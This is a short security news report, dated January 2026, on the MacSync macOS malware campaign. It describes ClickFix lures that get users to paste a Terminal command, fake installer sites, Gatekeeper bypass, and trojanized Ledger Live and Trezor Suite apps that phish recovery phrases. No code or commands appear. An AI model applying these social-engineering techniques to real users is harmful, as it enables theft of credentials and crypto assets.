MACSYNC is described as a sophisticated macOS malware campaign that uses social engineering and stealth to lure users, masquerading as a legitimate cloud storage installer to harvest cryptocurrency wallets and credentials. The campaign employs a ClickFix lure that coerces victims into pasting a malicious command into their Terminal to “fix” a fake error or complete an installation.
In observed cases, infection begins on sites that mimic trusted download portals, including a page that resembles a Microsoft login and redirects to a site posing as a legitimate macOS cloud storage installer. The malicious command fetches a remote script that bypasses macOS security features such as Gatekeeper and notarization, with attackers claiming to bypass verification by convincing users to execute the shell command.
Once inside, MacSync can Trojanize Electron-based cryptocurrency apps, overwriting components of Ledger Live or Trezor Suite to present a phishing wizard that captures device PINs and recovery phrases. Victims may later see a “Something went wrong…” screen and be prompted to re-enter their recovery phrase, handing over keys to their crypto assets; according to CloudSEK, the malware is marketed as a budget-friendly MaaS tool gaining traction among lower-tier affiliates due to its price. 23 January 2026